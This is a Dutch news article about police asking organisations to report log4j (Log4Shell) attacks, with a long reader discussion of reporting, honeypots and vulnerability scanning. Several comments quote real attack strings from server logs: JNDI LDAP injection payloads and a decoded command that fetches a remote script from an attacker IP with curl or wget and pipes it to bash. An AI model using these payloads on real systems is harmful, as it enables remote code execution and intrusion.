Politie roept op aangifte te doen van log4j-aanvallen

De Nederlandse politie heeft nog geen aangiften ontvangen van log4j-aanvallen, maar roept bedrijven en organisaties die slachtoffer zijn op dit wel te doen. De NCSC roept organisaties daarnaast op alert te blijven met de feestdagen.

Onduidelijk is in hoeverre organisaties in Nederland slachtoffer zijn van aanvallen via de log4j-kwetsbaarheid. Tot nu toe kwamen bij de regionale cybercrimeteams en het Team High Tech Crime nog geen aangiften binnen van dergelijke aanvallen.

De politie roept gedupeerden op dit wel te doen. Volgens de politie is het doen van aangifte noodzakelijk om details over aanvallen te verkrijgen, zoals gebruikte IP-adressen, en inzicht te krijgen in de werkwijze van criminelen. Onder andere de taskforce ransomware van het THTC zou baat hebben bij informatie over aanvallen via de Log4Shell-kwetsbaarheid.

Het Nationaal Cyber Security Centrum ziet vooralsnog alleen kleinschalig misbruik, maar de organisatie verwacht dat dit zal toenemen. Het NCSC roept organisaties daarom op zich voor te bereiden en ook tijdens de feestdagen alert te zijn op aanvallen. Het gebeurt vaker dat criminelen tijdens feestdagen toeslaan omdat systeembeheerders dan minder snel reageren op aanvallen.

Medio december werd bekend dat de veelgebruikte Java-library log4j een kritieke kwetsbaarheid bevatte. Vanwege de grote hoeveelheid applicaties die van de tool gebruikmaken, is de verwachting dat er grootschalig misbruik van gemaakt gaat worden.

Log4j-aanval

Reacties (82)

tweaker2010 24 december 2021 12:23

Je hebt toch geen aangifte nodig om onderzoek te doen? Neem aan dat de veiligheidsdiensten zelf ook al bezig zijn met onderzoek naar aanvallen en niet gaan zitten wachten tot de eerste aangifte binnen is.

CAPSLOCK2000

Beveiliging en antivirus
Politie

@tweaker2010 • 24 december 2021 13:02

Je hebt toch geen aangifte nodig om onderzoek te doen?

De uitleg staat in het artikel: "het doen van aangifte noodzakelijk om details over aanvallen te verkrijgen, zoals gebruikte IP-adressen, en inzicht te krijgen in de werkwijze van criminelen. Onder andere de taskforce ransomware van het THTC zou baat hebben bij informatie over aanvallen via de Log4Shell-kwetsbaarheid."

Zoals overal heeft men het druk. Als burgers/bedrijven zelf even komen melden dat er iets gebeurt is spaart dat een hoop tijd. De politie vraagt ook om iedere gestolen fiets aan te geven, ook al weet iedereen dat de meeste fietsen nooit meer terugkomen. Dat er fietsen gestolen worden weet iedere Nederlander, daar is die aangifte niet voor nodig.

In het algemeen geldt dat je alle misdaad moet aangeven. Maar bedrijven zien dat soms als nog meer werk en ook nog eens slecht voor hun imago. En als eenmaal bekend is dat er iets is gebeurd dan willen de aandeelhouders en klanten natuurlijk dat je maatregelen treft en die zijn typisch nogal duur.
Ze houden het liever geheim.

In deze tijd van het jaar speelt ook nog dat het halve land vrij heeft en dat niemand zin heeft om met kerst te werken. Aanvallers weten dat en slaan juist nu toe. Slachtoffers die moeten kiezen tussen hun prive-leven of hun werk zullen snel denken "laat de baas maar betalen want ik wil terug naar de kalkoen".
De aanvallen die we dusver hebben gezien zullen vooral van partijen zijn die niet kunnen of willen wachten, ofwel kleine vissen die hun slag moeten slaan voor de grote vissen komen, ofwel aanvallers die het op een specifiek doel voorzien hebben dat ze moeten raken voordat dit gat gedicht wordt.

Ik denk dat er nog weinig aangifte zijn gedaan omdat a) iedereen z'n handen vol heeft met het probleem oplossen, b) iedere slimme aanvaller wacht tot kerst is begonnen (zeker in delen van de wereld waar ze zelf geen kerst vieren), c) veel slachtoffers nog niet weten dat ze geraakt zijn.

Ga er maar vanuit dat de afgelopen dagen zijn gebruikt om lijsten met potentiele slachtoffers te maken en om de digitale betonschaar te slijpen. De komende dagen zouden wel eens pittig kunnen worden. Ik snap dat ze nu het nog kan zoveel mogelijk informatie willen verzamelen.

Polydeukes @CAPSLOCK2000 • 24 december 2021 13:58

Maar bedrijven zien dat soms als nog meer werk en ook nog eens slecht voor hun imago. En als eenmaal bekend is dat er iets is gebeurd dan willen de aandeelhouders en klanten natuurlijk dat je maatregelen treft en die zijn typisch nogal duur.
Ze houden het liever geheim.

Een aangifte bij de politie wordt niet openbaar gemaakt, dus ik zie het verband niet tussen aangifte doen en imagoschade. Dat je je medewerkers, klanten (en wellicht aandeelhouders) informeert over een cyber aanval is alleen noodzakelijk (en ook verplicht) indien daadwerkelijk (persoons)gegevens buitgemaakt zijn. Als je een aanval succesvol afweert, is er niks aan de hand.

CAPSLOCK2000

Beveiliging en antivirus
Politie

@Polydeukes • 24 december 2021 14:11

Een aangifte bij de politie wordt niet openbaar gemaakt, dus ik zie het verband niet tussen aangifte doen en imagoschade.

Als er vervolgens een groot onderzoek komt en een rechtszaak dan zou het als nog uit kunnen komen.

Dat je je medewerkers, klanten (en wellicht aandeelhouders) informeert over een cyber aanval is alleen noodzakelijk (en ook verplicht) indien daadwerkelijk (persoons)gegevens buitgemaakt zijn. Als je een aanval succesvol afweert, is er niks aan de hand.

Dat klopt, maar ik had het over de situatie waarin er wel iets mis is gegaan. Al is daar inderdaad duidelijk dat je het moet melden.

Echt lastig zijn overigens de twijfelgevallen. Vaak is helemaal niet duidelijk wat er nu precies aan de hand is. Dan ontstaat al snel de neiging om maar niet te veel onderzoek te doen onder het motto "wat niet weet dat niet deert".

Polydeukes @CAPSLOCK2000 • 24 december 2021 20:37

Als er vervolgens een groot onderzoek komt en een rechtszaak dan zou het als nog uit kunnen komen.

Als, kan... De politie, OM en rechtbank publiceren geen namen. De pers wellicht wel..

fastedje @Polydeukes • 24 december 2021 18:48

Niet geheel on-topic maar ik wil toch deze info even delen: Er zijn echt wel schrijnende voorbeelden waar b.v. een man aangifte deed van een schietpartij in zijn straat, criminelen konden hierdoor achter zijn naam en adres komen, die vervolgens zijn huis in brand hebben gezet. De nasleep was dat de man zijn huis kwijt was en jarenlang een oplossing met de gemeente wilde zoeken. Uiteindelijk heeft hij zichzelf in brand gestoken voor het gemeentehuis: zie deze link

divvid @CAPSLOCK2000 • 24 december 2021 14:50

Ga er maar vanuit dat de afgelopen dagen zijn gebruikt om lijsten met potentiele slachtoffers te maken en om de digitale betonschaar te slijpen. De komende dagen zouden wel eens pittig kunnen worden. Ik snap dat ze nu het nog kan zoveel mogelijk informatie willen verzamelen.

Als het goed is heb je alles al gescanned of offline gezet. Als dat niet kan heeft je prio toch echt verkeerd gelegen afgelopen weken

CAPSLOCK2000

Beveiliging en antivirus
Politie

@divvid • 24 december 2021 14:54

Als het goed is heb je alles al gescanned of offline gezet. Als dat niet kan heeft je prio toch echt verkeerd gelegen afgelopen weken

Maak daar maar 20 jaar van. Ik kan je op een briefje geven dat meeste organisaties nog niet al hun systemen hebben doorgelicht, laatstaan dat er passende maatregelen zijn genomen.

Kees BOFH @tweaker2010 • 24 december 2021 12:36

De politie mag niet zomaar naar mij stappen met een bevel om alle log4j hack-pogingen over te dragen, dat moet met een gerechtelijk bevel, en daar heb je een lopend onderzoek voor nodig, en voor een onderzoek heb je aangiftes nodig. En zelfs dan zal een rechter niet willekeurige organisaties die geen link hebben met het onderzoek dwingen om gegevens te overhandigen.

De makkelijkste manier voor de politie om wel aan deze gegevens te komen is als bedrijven die vrijwillig afstaan, bijvoorbeeld als onderdeel van een aangifte.

The Zep Man

Politie
Beveiliging en antivirus

@Kees • 24 december 2021 12:40

De makkelijkste manier voor de politie om wel aan deze gegevens te komen is als bedrijven die vrijwillig afstaan, bijvoorbeeld als onderdeel van een aangifte.

Volgens mij is een makkelijke en accuratere manier om honeypots op te zetten. Dan ben je ook niet afhankelijk van de meldingen van derden.

Als pogingen tot aanvallen meetellen, dan zijn er bedrijven die +3000 keer per dag aangifte kunnen doen. Is daar al een API voor bij de politie? Laat ze meteen LOG4J gebruiken voor het gewenste resultaat.

Kees BOFH @The Zep Man • 24 december 2021 12:46

Een honeypot (als de politie dat al mag gebruiken, dat weet ik niet..) pak je alleen scanners mee. Gerichte aanvallen op een specifiek bedrijf zie je daar niet mee. Ook scanners die zoeken op bepaalde software voordat ze over gaan tot een poging om te exploiteren zul je daar niet makkelijk mee te pakken krijgen.

En tja, als pogingen tot aanvallen meetellen dan ben ik nog wel even zoet; sinds ik het hier op tweakers bijhoud heb ik al meer dan 28 miljoen verdachte requests gezien. Dan moet ik de aangifte wel gaan automatiseren ja

Nox @Kees • 24 december 2021 16:36

Heeft de politie geen API om aangifte te doen?

Zodiac @Nox • 24 december 2021 18:37

Maar daar werd ook gebruik gemaakt van log4j, dus die is offline gehaald

m4ikel @Kees • 24 december 2021 12:45

Dat is een veel gehoord misverstand. Er is namelijk ook "ambtshalve vervolgbaar" zie: https://www.om.nl/onderwe...r-aangifte-onderzoek-doen

Voorwaarde is algemeen belang, dat is in deze wel aangetoond.

Edit: nog ter verduidelijking, het OM kan een slachtoffer niet dwingen tot medewerking, mijn opmerking gaat over het stukje onderzoek zonder aangifte.

[Reactie gewijzigd door m4ikel op 24 juli 2024 09:53]

FreezeXJ @m4ikel • 24 december 2021 12:51

Tja, en ook dan zul je op z'n minst een aanknopingspunt moeten hebben, en kun je niet zomaar naar Tweakers lopen en zeggen dat je even alle logs wilt want misschien zit er een log4j-hack tussen. Daarnaast is het inefficient, dus zal het hiervoor niet gebeuren.

m4ikel @FreezeXJ • 24 december 2021 13:14

Het onderzoekt loopt al, men vraagt nu enkel medewerking aan potentiële slachtoffers voor bewijsvoering en verdere analyse.

gorgi_19 @m4ikel • 24 december 2021 13:14

Da's wel een redelijk groot sleepnet wat je wilt uitgooien.

Als de politie bij Tweakers gaan navragen dan:

1. Is het onbekend wie de verdachte is, of dat er uberhaupt wel een verdachte is
2. Of er wel (poging tot) een misdrijf is gepleegd jegens Tweakers of niet.

m4ikel @gorgi_19 • 24 december 2021 13:16

Daar doel ik ook niet op, het is aan het slachtoffer om aangifte te doen (en bewijs te leveren). Maar ik doelde op het feit dat het OM prima zelf een onderzoek kan opstarten zonder aangifte. (oorspronkelijk reactie aangepast).

[Reactie gewijzigd door m4ikel op 24 juli 2024 09:53]

RobjeDopje @tweaker2010 • 24 december 2021 12:26

Het lijkt me toch vrij zorgelijk als de veiligheidsdiensten al het verkeer naar alle servers kunnen terugspitten om te kijken welke data er is verstuurd en door wie

downtime @tweaker2010 • 24 december 2021 12:28

Het staat gewoon in het artikel. Voor hun onderzoek hebben ze meer informatie nodig.

svennd @tweaker2010 • 24 december 2021 14:00

Ieder webserver log zit vol met attempts ... ik snap het ook niet helemaal. Iedere ambtenaar kan een PV schrijven.

Polderviking

24 december 2021 12:24

Maar wanneer precies doe je er aangifte van dan?
Want als iedereen die dat in zijn webserver logs voorbij heeft zien komen aangifte moet doen dan kan iedereen met een computer aan het internet zich wel gaan melden.

hottestbrain

@Polderviking • 24 december 2021 12:36

En dat is exact wat gewenst is. Volledig in kaart brengen waar de pogingen vandaan komen en aanpakken die handel.

Polderviking

@hottestbrain • 24 december 2021 12:48

Een honeypot opzetten lijkt me kosteneffectiever.

hottestbrain

@Polderviking • 24 december 2021 13:10

Als je niets hoeft uit te geven/op te zetten voor meer data, is dat kosteneffectiever dan een honeypot.

Polderviking

@hottestbrain • 24 december 2021 13:13

Een team bij elkaar trommelen om door een miljoenmiljard aangiftes te gaan lijkt me prijziger dan 1 handige ICT-er die even opzettelijk een kwestbare server aan het internet knoopt.

hottestbrain

@Polderviking • 24 december 2021 14:53

behalve als je over wil gaan tot vervolging

Polderviking

@hottestbrain • 24 december 2021 16:13

Fair enough, maar je moet je sowieso je rechercheurs van stal halen.

dutchgio @Polderviking • 24 december 2021 12:54

Inderdaad, dit is dusdanig groot dat je daarmee ook inzicht krijgt in de aanvallen.
Opmerkelijk dat ze dat bij het Team High Tech Crime niet lijken te hebben dan.
Je hebt geen aangifte nodig als je ervoor zorgt dat je zelf het doelwit bent.

NuEffeNiet @Polderviking • 24 december 2021 13:50

Wie zegt je dat ze dat niet ook doen?

We gaan er te vaak van uit dat iets of/of is, terwijl het best allebei gedaan kan worden voor een maximale effectiviteit.

Overigens ben ik het ermee eens dat ze dit ook moeten doen (als ze dit niet al doen)

kodak

Politie
Beveiliging en antivirus

@Polderviking • 24 december 2021 14:35

Aangezien je op geen enkele manier duidelijk maakt waarom het alleen om kosteneffectiviteit zou moeten draaien, je geheel buiten beschouwing laat dat handhaven om veel meer gaat en ook geen uitleg geeft welk probleem het wel en niet oplost, lijkt je opmerking meer te gaan om zomaar wat te beweren omdat het kan.

Polderviking

@kodak • 24 december 2021 16:12

Goed verhaal.

kodak

Politie
Beveiliging en antivirus

@Polderviking • 24 december 2021 12:52

Je doet aangifte als je van mening bent dat de wet is overtreden. En het is waarschijnlijk hoe dan ook verstandiger om wel aangifte te doen, omdat je anders indirect duidelijk maakt dat je het niet zo'n probleem lijkt dat criminelen hun gang kunnen gaan.

Dorank @kodak • 24 december 2021 13:28

Ik heb hier honeypots die de godsganselijke dag allerlei misbruik pogingen voor hun kiezen krijgen. Het heeft geen zin om hier aangifte van te doen, het komt of uit regios waar niemand zich daar druk over maakt of via compromised accounts/machines. Ja, de Nederlandse en zeer waarschijnlijk locale wetten waar het verkeer vandaan komt worden met voeten getreden. Maar het zou meer dan een dag taak zijn om er iets mee te doen anders dan het voeden van firewalls om zo alle klanten proberen af te schermen.

kodak

Politie
Beveiliging en antivirus

@Dorank • 24 december 2021 14:20

Als jij die honeypots opzettelijk met het doel gebruikt om criminelen gelegenheid te geven iets te doen dan kan je niet zomaar stellen dat de wet is overtreden. Daarbij, als je wel van mening bent dat je een opzettelijk iets kan neerzetten om aan te tonen dat de wet is overtreden dan mag wel verwacht worden dat je daar ook aangifte van gaat doen. Alleen maar de voordelen willen om opzettelijk gelegenheid te geven lijkt me geen reden om te gaan klagen dat het veel werk is. Dan had je er waarschijnlijk wat beter over na moeten denken waarom je het opzettelijk doet?

Dorank @kodak • 24 december 2021 15:32

Als jij die honeypots opzettelijk met het doel gebruikt om criminelen gelegenheid te geven iets te doen dan kan je niet zomaar stellen dat de wet is overtreden.

Je hebt een heel specifieke definitie van honeypots en denkt dat iedereen deze ook gebruikt. Mijn honeypots monitoren pogingen tot toegang tot services die niet geadverteerd worden.

Daarbij, als je wel van mening bent dat je een opzettelijk iets kan neerzetten om aan te tonen dat de wet is overtreden dan mag wel verwacht worden dat je daar ook aangifte van gaat doen. Alleen maar de voordelen willen om opzettelijk gelegenheid te geven lijkt me geen reden om te gaan klagen dat het veel werk is.

Maar er is helemaal geen gelegenheid tot iets!

Dan had je er waarschijnlijk wat beter over na moeten denken waarom je het opzettelijk doet?

Waarom ik wat opzettelijk doe?

Mijn honeypots draaien bv ssh, sip, http daemons. Een ieder die een poging doet om te authenticeren met ssh of in het geval van SIP een INVITE te plaatsen of een complexe URL op te vragen wordt gewoon geregistreerd. Deze honeypots doen verder niets, die ssh heeft een config die geslaagde authenticaties onmogelijk maakt, die SIP server stuurt altijd een authenticatie challenge, de webserver stuurt vrijwel altijd een 404, een 403 op requests voor "admin" paginas van populare sites.

Afhankelijk van wat er precies werd bevraagd, hoe vaak en in welke interval word er iets geblokkeerd ergens totaal anders. De kans dat een daadwerkelijk klant een honeypot bevraagd die ogenschijnlijk niet gekoppeld is aan onze AS-en is 0. Deze honeypots zijn dus puur detectie.

De kosten voor het hosten van deze honeypots, een paar tientjes per maand. Een paar keer per maand de log files voor de httpd bekijken of er interessante nieuwe patronen zijn op het moment dat iemand een half uurtje overheeft staat in geen verhouding tot de hoeveelheid werk voor het maken van aangiftes omdat er pogingen tot computervredebreuk zijn.

Douweegbertje @Dorank • 24 december 2021 15:45

Je kunt een heel betoog maken wat jouw mening is en niet de wet die geïnterpreteerd moet worden. Ik ben het wel met je eens maar het werkt alleen niet zo.
Iets met uitlokken, etc. Hetzelfde dat de politie niet zomaar een fiets open kan neerzetten en kijken wie hem jat. Of een hele dure fiets op slot savonds in een steegje.
Het gaat hier niet om de mening wat wij er van vinden maar hoe krom de wet dan is (naar mijn mening)

tweaknico @Douweegbertje • 24 december 2021 20:00

Honeypots zijn in het algemeen machines die op een adres zitten die op geen enkele manier gepromoot worden en alleen loggen wat er allemaal gebeurt.
Zoals genoemd een ssh server die vereist dat de gebruiker bv. in de groep nologins zit, waar geen enkele gebruiker lid van is. En meer van dergelijke diensten...

Wie pak je met zo'n setup: lieden die het net afstruinen naar zwakke plekken.. fyi. Mijn firewall doet iets vergelijkbaars, ik heb geen redis server, maar als iemand een keer of 3 probeert de redis poort op mijn adres te gebruiken, dat gaat het adres voor een weekje op een afkoellijst. Als gedurende de week nog een paar pogingen voor komen dat gaat naar de zwarte lijst. (permanent) en worden alle pogingen tot gebruik vanaf dat moment aan het honeypot project van dshield doorgegeven. En dat voor alle poorten waar niet legitiem verbinding mee gemaakt wordt.

Je hoeft geen poortscan op mijn adres te doen... FYI er zijn hele netwerk reeksen van /24 en een /22 op m'n zwarte lijst terecht gekomen toch best knap.

[Reactie gewijzigd door tweaknico op 24 juli 2024 09:53]

Douweegbertje @tweaknico • 24 december 2021 20:50

Ik weet niet waarom je mij een hele uitleg gaat geven over wat het technisch in kan houden met daarin nog enkele logica flaws over de definitie.

RJWvdH @Polderviking • 24 december 2021 12:35

Inderdaad, ik zie deze bijv ook langskome in EventViewer, al hebben wij geen applicaties welke gebruik maken van log4j

Process information:
Process ID: 2500
Process name: w3wp.exe
Account name: IIS APPPOOL\DefaultAppPool

Exception information:
Exception type: HttpException
Exception message: A potentially dangerous Request.Path value was detected from the client (.
at System.Web.HttpRequest.ValidateInputIfRequiredByConfig()
at System.Web.HttpApplication.PipelineStepManager.ValidateHelper(HttpContext context)

Request information:
Request URL: https://XXX.XXX.XXX.XXX:443/${jndi:ldap:/121.140.99.236:1389/Exploit}
Request path: /${jndi:ldap:/121.140.99.236:1389/Exploit}
User host address: 185.184.152.140
User:
Is authenticated: False
Authentication Type:
Thread account name: IIS APPPOOL\DefaultAppPool

TheDutchChief @Polderviking • 24 december 2021 12:46

Zie inderdaad op mijn router meldingen voorbij komen.

Mijzelf @TheDutchChief • 24 december 2021 12:56

Op je router? Doet die deep packet inspection dan?

TheDutchChief @Mijzelf • 24 december 2021 13:07

Euh, dat staat blijkbaar aan, Ubiquiti USG-3P:
Threat Management Alert 1: Attempted Administrator Privilege Gain. Signature ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228). From: 221.226.159.22:43658, to: 192.168.xxx.xxx:80, protocol: TCP

CAPSLOCK2000

Beveiliging en antivirus
Politie

@Polderviking • 24 december 2021 13:09

Maar wanneer precies doe je er aangifte van dan?
Want als iedereen die dat in zijn webserver logs voorbij heeft zien komen aangifte moet doen dan kan iedereen met een computer aan het internet zich wel gaan melden.

Ik denk dat ze het over succesvolle aanvallen hebben. Dat is de enige redelijke uitleg want je kan inderdaad niet iedere scan gaan melden. Dan kun je het nog hebben over de vraag wat een succesvolle aanval is. Is het een succesvolle aanval als iemand weet binnen te dringen of pas als er schade is of informatie wordt gestolen? En tenslotte moet je je ook nog afvragen of het slachtoffer de zaak wel goed overziet want het wordt al snel complex.
In praktijk denk ik overigens dat het vrij simpel is: de meeste organisaties zullen pas ontdekken dat ze zijn aangevallen als er schade wordt gevonden. In dat geval lijkt het me wel duidelijk dat je aangifte moet doen.

nextware 24 december 2021 12:29

Vanuit onze NDR werden wij geattendeerd op enkele pogingen "tot" op de 12e en 13e december. We hebben hierna ook nog gekeken naar eventuele lateral movements, maar hierin was niks te vinden. Hierna is het stil gebleven. Als we de IP-adressen bekeken, kwamen deze uit de regio waar Poetin de scepter zwaait en één uit de zuidelijke regionen van Afrika. Lijkt me dat de politie hier toch vrij weinig aan zal kunnen doen als wij deze IP-adressen door zouden geven.

Voor de rest tel ik onze zegeningen dat onze firewalls etc 24/7/365 (extern) gemonitored worden zodat, als er iets speelt, er direct op ingegrepen kan worden.

CAPSLOCK2000

Beveiliging en antivirus
Politie

@nextware • 24 december 2021 13:17

Lijkt me dat de politie hier toch vrij weinig aan zal kunnen doen als wij deze IP-adressen door zouden geven.

Ik weet niet of het de bedoeling is om pogingen door te geven, maar laten we niet te veel speculeren over wat ze precies gaan doen met die informatie. Een lijstje met vijandige ip-adressen die je kan laten blokkeren kan ook al nuttig zijn. Misschien van beperkt nut, maar goed.

Voor de rest tel ik onze zegeningen dat onze firewalls etc 24/7/365 (extern) gemonitored worden zodat, als er iets speelt, er direct op ingegrepen kan worden.

Ik weet niet wat voor firewalls je hebt, de term wordt tegenwoordig nogal breed gebruikt, maar de meeste firewalls zullen niks merken van een log4j aanval. De aanval komt immers binnen op een "publieke" poort.
Maar goed, gezien de manier waarop je er over praat ga ik er van uit dat dit niet je enige verdediging is.

kodak

Politie
Beveiliging en antivirus

@nextware • 24 december 2021 14:49

Als je meteen al gaat klagen dat de politie waarschijnlijk toch weinig kan doen om geen aangifte te doen dan lijkt het me eerder dat je excuus aan het zoeken bent om criminelen hun gang maar te laten gaan. Een aangifte is namelijk juist een van de sterkste middelen om duidelijk te maken dat de criminaliteit je te ver gaat en je daar oplossingen voor wil en nodig hebt.
Daarbij gaat iets doen niet alleen om wat de politie met mogelijk buitenlandse verdachten kan. De politie is er ook om (al dan niet indirect) te zorgen voor voorkomen van grotere problemen.

Cergorach

Beveiliging en antivirus

24 december 2021 13:48

Ik vermoed dat veel mensen en ITers de tijd die ze moeten besteden aan het doen van aangiften beter benut kan worden aan de boel te patchen. Zeker gezien de persoonlijke ervaring van veel mensen met de politie, aangiften doen en daadwerkelijke followup/resultaten...

Er wordt vaak geroepen dat aangifte doen van internetoplichting via bv. marktplaats niet voldoende prioriteit heeft bij oa. de politie en OM, dit is nu de keerzijde daarvan. Als de politie/OM geen tijd heeft als een doorsnee burger hulp vraagt bij een klein issue, dan zal de doorsnee burger ook niet snel helpen als de politie dat vraagt als het gaat om een hack aanval/poging. De ITers en medewerkers van bedrijven die deze aangifte zouden moeten doen, zijn exact dezelfde doorsnee burgers... Is dat heel netjes? Nee, maar wel heel menselijk.

Daarnaast, dit bericht is gisteravond om 18:59 de deur uitgegaan, verwacht men nu echt dat men de (werk)dag voor kerstmis nog aangifte gaat doen voor iets dat al weken speelt? De bezetting bij veel bedrijven is ook niet echt groot tussen kerst en nieuwjaar... Een gevalletje van "A little late!".

CAPSLOCK2000

Beveiliging en antivirus
Politie

@Cergorach • 24 december 2021 14:33

Daarnaast, dit bericht is gisteravond om 18:59 de deur uitgegaan, verwacht men nu echt dat men de (werk)dag voor kerstmis nog aangifte gaat doen voor iets dat al weken speelt? De bezetting bij veel bedrijven is ook niet echt groot tussen kerst en nieuwjaar... Een gevalletje van "A little late!".

Ja, dat mogen ze verwachten. Als er met kerstmis een gebouw in brand vliegt moet de brandweer ook aan het werk. Dat hoort er bij. Iedereen heeft nu twee weken gehad om z'n zaakjes te regelen. Als je daar nu nog niet mee klaar bent dan heb je geen controle over je IT-omgeving.

Nu weet ik best dat 90% van de organisaties inderdaad geen control hebben over hun IT maar dat is geen excuus. We hebben jarenlang te weinig geïnvesteerdin veilige IT en iedereen weet het. Dat soort dingen veranderen pas als het pijn doet. Het enige wat zuur is, is dat de mensen die de troep nu mogen opruimen waarschijnlijk de IT'ers zijn die toch al niet voor deze situatie hebben gekozen.

Een van mijn stokpaardjes is dat de beste manier om een betrouwbare applicatie is zorgen dat de persoon die daadwerkelijk iets kan veranderen uit bed wordt gebeld als er iets mis gaat. Dan zorgt die persoon wel dat dat niet gebeurt. Als je iemand anders de troep laat opruimen de kans groot dat andere prioriteiten voor gaan.
Dat geldt net zo goed voor de managers die besluiten of we komende maand een nieuwe applicatie uitrollen of een oude applicatie beter beveiligen. Zolang die alleen beloond worden voor nieuwe applicaties en features en niet gestraft worden voor oude of onveilige systemen zal er niet veel veranderen.

Ik wil niemand z'n kerst verpesten maar ik heb ook geen sympathie voor organisaties die lui zijn geweest en nu zielig doen. Ik weet dat niemand bewust kiest voor deze situatie, maar indirect is het wel degelijk een keuze.

PS. Full disclosure: mijn werkgever zou ook nog wel wat kunnen verbeteren en mijn kerst is ook niet... ideaal. Ik zeg het er even bij om niet het beeld te geven dat ik het zelf allemaal zo perfect voor elkaar heb want dat is redelijk ongeloofwaardig. Ik snap heel goed dat mensen klem zitten tussen belangen en dat er vaak geen goede antwoorden zijn. Dat neemt niet weg dat we wel iets aan de balans moeten veranderen en dat de huidige structuren daar niet aan bij dragen.

[Reactie gewijzigd door CAPSLOCK2000 op 24 juli 2024 09:53]

Simon Weel 24 december 2021 12:31

Uh, de politie kan toch een 'honeypot' gebruiken?

RienBijl @Simon Weel • 24 december 2021 12:35

Dan vang je alleen geautomatiseerde scanners. Daar zijn er momenteel ontelbaar van. Ik denk dat het de politie hier meer gaat om gerichte aanvallen.

MrMonkE @RienBijl • 24 december 2021 18:47

Wel als je je honeypot mag neerzetten onder definatelynotahoneypot.rabobank.nl en er zaken 'zichtbaar' worden die het voor handmatige voortzetting interessant maken.

Daarom is het ook een honeyepot... niet te weerstaan.

"Een honeypot is een computer of een keten van computers die applicaties en data bevatten om hackers te lokken. Het is speciaal opgezet om kwaadwillende hackers aan te pakken en ze in de val te laten lopen. Een honeypot ziet eruit als een echt systeem met kwetsbaarheden waar hackers misbruik van kunnen maken. Dit systeem is losgekoppeld van de rest van het netwerk en wordt zorgvuldig gemonitord. Hackers weten dat niet, en lopen zo in de val." bron: https://nordvpn.com/nl/blog/honeypot/

Jerie

24 december 2021 12:48

Kan me voorstellen dat een gemiddeld SOC andere prio heeft momenteeel, maar... altijd aangifte doen. Zonder aangifte weet men niets, doe je zelfs niet mee in een eventuele data analyse.

kodak

Politie
Beveiliging en antivirus

@Jerie • 24 december 2021 14:53

Een SOC is vaak slechts een hulpmiddel om de verantwoordelijke voor de systemen te helpen. Dat een SOC het druk kan hebben wil dus niet zomaar betekenen dat er geen aangifte gedaan kan worden door de verantwoordelijke.

willyb 24 december 2021 12:57

In hoeverre zou het mogelijk geautomatiseerd die aanvallen door te geven? In blik in een willekeurige accesslog van zelfs je privé webservertje toont genoeg pogingen. Maar een aangifte doen kost je natuurlijk tijd en die drempel wil je verlagen.

En hoe filter je de “ethical” pogingen eruit? Of doet de politie dat?

tweaknico @willyb • 24 december 2021 20:19

Ethical hack pogingen zijn op contract basis op afroep ==> adressen zijn bekend bij de organisatie die de test ondergaat.

Dus als jij het adres niet herkent ... kan het geen ethical hacker zijn en is het ook niet een van je andere partners/klanten/leveranciers op het net.

willyb @tweaknico • 24 december 2021 20:26

Die aanname klopt niet.

Als je een https://www.ncsc.nl/docum.../2019/mei/01/cvd-leidraad programma actief hebt weet je echt niet wie op welk moment jouw systemen even test.

Voorbeeldje:
https://twitter.com/0xDUDE/status/1472504280691130372?s=20

tweaknico @willyb • 24 december 2021 20:32

Ik heb DIVD.nl niet gevraagd om mijn beveiliging te controleren, een ook die RU en US inbrekers niet.
Dus vanwaar die onvrijwillige test die niet van een inbraak te onderscheiden is?...

Mijn systemen HOEVEN niet getest te worden, TENZIJ ik daar om vraag!. En dan weet ik wie ik het vraag.
(Ik hanteer een zwerte lijst voor overtreders en overtreders komen vanzelf op de zwarte lijst. en dan is er niets meer te testen.. ).

engibenchi @willyb • 25 december 2021 18:43

Ja klopt Fail2Ban heeft inmiddels 20 IP addressen geblokkeerd voor log4j-jndi. En dat is op een privé test servertje waar niets bijzonders draait. En ik zeker niet, veel bezoekers op heb. Ik wil de adressen met plezier naar iemand sturen maar om nu een volledige aangifte te doen vind ik weer wat over de top.
Zou ik dan 20 aangiften moeten doen?

Jim80 24 december 2021 13:26

Ik heb 3 dagen geleden de eerste poging gezien op mijn webserver (die overigens niet kwetsbaar is voor log4j):

user-agent: ${jndi:ldap://sidn-divd-c70jvj6j8c872oujkb10_${date:yyyymmddhhmmss}_https_user-agent.log4jdns.x00.it/}

Dit vanaf IP address 20.126.158.82

city: "Amsterdam"
region: "North Holland"
country: "NL"
loc: "52.3740,4.8897"
org: "AS8075 Microsoft Corporation"

Als dit niet gespoofed is, lijkt dit vanuit Microsoft te komen!

Moet ik nu aangifte doen tegen Microsoft? Of is men veiligheidshalve op kwetsbare servers aan het scannen?

[Reactie gewijzigd door Jim80 op 24 juli 2024 09:53]

Cergorach

Beveiliging en antivirus

@Jim80 • 24 december 2021 13:40

Als je even had gegoogled:
https://twitter.com/divdnl

Oproep aan alle Nederlandse Internet service providers. 20.126.158.82 is @DIVDnl

- https://csirt.divd.nl/cases/DIVD-2021-00038/

ip: 20.126.158.82
city: Amsterdam
region: North Holland
country: NL
org: "AS8075 Microsoft Corporation"

AUB geen abuse meldingen naar Microsoft maar naar DIVD. :-)

Dus... Aangifte doen tegen DIVD: Dutch Institute for Vulnerability Disclosure ;-)
https://www.divd.nl/

tweaknico @Cergorach • 24 december 2021 20:21

Misschien toch wel aangifte doen. Ik heb nl niet om een portscan gevraagd, overigens zie ik wel meer pogingen en die komen van over de hele wereld. Azie, RU, US.

Grappige payload, als je door base64 -d haalt:

(curl -s 195.54.160.149:5874/my.ad.re.ss:443||wget -q -O - 195.54.160.149:5874/my.ad.re.ss:443)|bash

of variaties...

[Reactie gewijzigd door tweaknico op 24 juli 2024 09:53]

Cergorach

Beveiliging en antivirus

@tweaknico • 25 december 2021 00:17

Misschien toch wel aangifte doen. Ik heb nl niet om een portscan gevraagd

Aan de ene kant heb je gelijk, aan de andere kant proberen deze gasten een veiliger Internet te maken, dus aangifte doen voelt een beetje aan als een arsehole actie...

tweaknico @Cergorach • 25 december 2021 14:22

Dus je stelt voor een "een paar goeie gasten" alle huizen in NL langs te laten gaan en alle open deuren rapporteren??.

Cergorach

Beveiliging en antivirus

@tweaknico • 25 december 2021 18:19

Yes please! ;-)

tweaknico @Cergorach • 28 december 2021 00:20

Als bewijs van open deur wel een foto van een deel van het interieur wat alleen te zien als als de deur open stond en het gebouw te betreden was.
